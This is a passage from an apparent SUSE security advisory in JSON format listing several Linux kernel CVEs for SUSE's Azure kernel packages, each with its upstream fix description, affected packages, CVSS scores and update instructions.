"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: ath12k: fix memory leak in ath12k_pci_remove()\n\nKmemleak reported this error:\n\n unreferenced object 0xffff1c165cec3060 (size 32):\n comm \"insmod\", pid 560, jiffies 4296964570 (age 235.596s)\n backtrace:\n [\u003c000000005434db68\u003e] __kmem_cache_alloc_node+0x1f4/0x2c0\n [\u003c000000001203b155\u003e] kmalloc_trace+0x40/0x88\n [\u003c0000000028adc9c8\u003e] _request_firmware+0xb8/0x608\n [\u003c00000000cad1aef7\u003e] firmware_request_nowarn+0x50/0x80\n [\u003c000000005011a682\u003e] local_pci_probe+0x48/0xd0\n [\u003c00000000077cd295\u003e] pci_device_probe+0xb4/0x200\n [\u003c0000000087184c94\u003e] really_probe+0x150/0x2c0\n\nThe firmware memory was allocated in ath12k_pci_probe(), but not\nfreed in ath12k_pci_remove() in case ATH12K_FLAG_QMI_FAIL bit is\nset. So call ath12k_fw_unmap() to free the memory.\n\nTested-on: WCN7850 hw2.0 PCI WLAN.HMT.2.0-02280-QCAHMTSWPL_V1.0_V2.0_SILICONZ-1",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-37744",
"url": "https://www.suse.com/security/cve/CVE-2025-37744"
},
{
"category": "external",
"summary": "SUSE Bug 1243662 for CVE-2025-37744",
"url": "https://bugzilla.suse.com/1243662"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-37744"
},
{
"cve": "CVE-2025-37751",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-37751"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nx86/cpu: Avoid running off the end of an AMD erratum table\n\nThe NULL array terminator at the end of erratum_1386_microcode was\nremoved during the switch from x86_cpu_desc to x86_cpu_id. This\ncauses readers to run off the end of the array.\n\nReplace the NULL.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-37751",
"url": "https://www.suse.com/security/cve/CVE-2025-37751"
},
{
"category": "external",
"summary": "SUSE Bug 1242505 for CVE-2025-37751",
"url": "https://bugzilla.suse.com/1242505"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-37751"
},
{
"cve": "CVE-2025-37813",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-37813"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: xhci: Fix invalid pointer dereference in Etron workaround\n\nThis check is performed before prepare_transfer() and prepare_ring(), so\nenqueue can already point at the final link TRB of a segment. And indeed\nit will, some 0.4% of times this code is called.\n\nThen enqueue + 1 is an invalid pointer. It will crash the kernel right\naway or load some junk which may look like a link TRB and cause the real\nlink TRB to be replaced with a NOOP. This wouldn\u0027t end well.\n\nUse a functionally equivalent test which doesn\u0027t dereference the pointer\nand always gives correct result.\n\nSomething has crashed my machine twice in recent days while playing with\nan Etron HC, and a control transfer stress test ran for confirmation has\njust crashed it again. The same test passes with this patch applied.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-37813",
"url": "https://www.suse.com/security/cve/CVE-2025-37813"
},
{
"category": "external",
"summary": "SUSE Bug 1242909 for CVE-2025-37813",
"url": "https://bugzilla.suse.com/1242909"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-37813"
},
{
"cve": "CVE-2025-38209",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38209"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnvme-tcp: remove tag set when second admin queue config fails\n\nCommit 104d0e2f6222 (\"nvme-fabrics: reset admin connection for secure\nconcatenation\") modified nvme_tcp_setup_ctrl() to call\nnvme_tcp_configure_admin_queue() twice. The first call prepares for\nDH-CHAP negotitation, and the second call is required for secure\nconcatenation. However, this change triggered BUG KASAN slab-use-after-\nfree in blk_mq_queue_tag_busy_iter(). This BUG can be recreated by\nrepeating the blktests test case nvme/063 a few times [1].\n\nWhen the BUG happens, nvme_tcp_create_ctrl() fails in the call chain\nbelow:\n\nnvme_tcp_create_ctrl()\n nvme_tcp_alloc_ctrl() new=true ... Alloc nvme_tcp_ctrl and admin_tag_set\n nvme_tcp_setup_ctrl() new=true\n nvme_tcp_configure_admin_queue() new=true ... Succeed\n nvme_alloc_admin_tag_set() ... Alloc the tag set for admin_tag_set\n nvme_stop_keep_alive()\n nvme_tcp_teardown_admin_queue() remove=false\n nvme_tcp_configure_admin_queue() new=false\n nvme_tcp_alloc_admin_queue() ... Fail, but do not call nvme_remove_admin_tag_set()\n nvme_uninit_ctrl()\n nvme_put_ctrl() ... Free up the nvme_tcp_ctrl and admin_tag_set\n\nThe first call of nvme_tcp_configure_admin_queue() succeeds with\nnew=true argument. The second call fails with new=false argument. This\nsecond call does not call nvme_remove_admin_tag_set() on failure, due to\nthe new=false argument. Then the admin tag set is not removed. However,\nnvme_tcp_create_ctrl() assumes that nvme_tcp_setup_ctrl() would call\nnvme_remove_admin_tag_set(). Then it frees up struct nvme_tcp_ctrl which\nhas admin_tag_set field. Later on, the timeout handler accesses the\nadmin_tag_set field and causes the BUG KASAN slab-use-after-free.\n\nTo not leave the admin tag set, call nvme_remove_admin_tag_set() when\nthe second nvme_tcp_configure_admin_queue() call fails. Do not return\nfrom nvme_tcp_setup_ctrl() on failure. Instead, jump to \"destroy_admin\"\ngo-to label to call nvme_tcp_teardown_admin_queue() which calls\nnvme_remove_admin_tag_set().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38209",
"url": "https://www.suse.com/security/cve/CVE-2025-38209"
},
{
"category": "external",
"summary": "SUSE Bug 1246022 for CVE-2025-38209",
"url": "https://bugzilla.suse.com/1246022"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-38209"
},
{
"cve": "CVE-2025-38243",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38243"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: fix invalid inode pointer dereferences during log replay\n\nIn a few places where we call read_one_inode(), if we get a NULL pointer\nwe end up jumping into an error path, or fallthrough in case of\n__add_inode_ref(), where we then do something like this:\n\n iput(\u0026inode-\u003evfs_inode);\n\nwhich results in an invalid inode pointer that triggers an invalid memory\naccess, resulting in a crash.\n\nFix this by making sure we don\u0027t do such dereferences.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38243",
"url": "https://www.suse.com/security/cve/CVE-2025-38243"
},
{
"category": "external",
"summary": "SUSE Bug 1246184 for CVE-2025-38243",
"url": "https://bugzilla.suse.com/1246184"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-38243"
},
{
"cve": "CVE-2025-38322",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38322"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nperf/x86/intel: Fix crash in icl_update_topdown_event()\n\nThe perf_fuzzer found a hard-lockup crash on a RaptorLake machine:\n\n Oops: general protection fault, maybe for address 0xffff89aeceab400: 0000\n CPU: 23 UID: 0 PID: 0 Comm: swapper/23\n Tainted: [W]=WARN\n Hardware name: Dell Inc. Precision 9660/0VJ762\n RIP: 0010:native_read_pmc+0x7/0x40\n Code: cc e8 8d a9 01 00 48 89 03 5b cd cc cc cc cc 0f 1f ...\n RSP: 000:fffb03100273de8 EFLAGS: 00010046\n ....\n Call Trace:\n \u003cTASK\u003e\n icl_update_topdown_event+0x165/0x190\n ? ktime_get+0x38/0xd0\n intel_pmu_read_event+0xf9/0x210\n __perf_event_read+0xf9/0x210\n\nCPUs 16-23 are E-core CPUs that don\u0027t support the perf metrics feature.\nThe icl_update_topdown_event() should not be invoked on these CPUs.\n\nIt\u0027s a regression of commit:\n\n f9bdf1f95339 (\"perf/x86/intel: Avoid disable PMU if !cpuc-\u003eenabled in sample read\")\n\nThe bug introduced by that commit is that the is_topdown_event() function\nis mistakenly used to replace the is_topdown_count() call to check if the\ntopdown functions for the perf metrics feature should be invoked.\n\nFix it.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38322",
"url": "https://www.suse.com/security/cve/CVE-2025-38322"
},
{
"category": "external",
"summary": "SUSE Bug 1246447 for CVE-2025-38322",
"url": "https://bugzilla.suse.com/1246447"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 0,
"baseSeverity": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-38322"
},
{
"cve": "CVE-2025-38379",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38379"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb: client: fix warning when reconnecting channel\n\nWhen reconnecting a channel in smb2_reconnect_server(), a dummy tcon\nis passed down to smb2_reconnect() with -\u003equery_interface\nuninitialized, so we can\u0027t call queue_delayed_work() on it.\n\nFix the following warning by ensuring that we\u0027re queueing the delayed\nworker from correct tcon.\n\nWARNING: CPU: 4 PID: 1126 at kernel/workqueue.c:2498 __queue_delayed_work+0x1d2/0x200\nModules linked in: cifs cifs_arc4 nls_ucs2_utils cifs_md4 [last unloaded: cifs]\nCPU: 4 UID: 0 PID: 1126 Comm: kworker/4:0 Not tainted 6.16.0-rc3 #5 PREEMPT(voluntary)\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-4.fc42 04/01/2014\nWorkqueue: cifsiod smb2_reconnect_server [cifs]\nRIP: 0010:__queue_delayed_work+0x1d2/0x200\nCode: 41 5e 41 5f e9 7f ee ff ff 90 0f 0b 90 e9 5d ff ff ff bf 02 00\n00 00 e8 6c f3 07 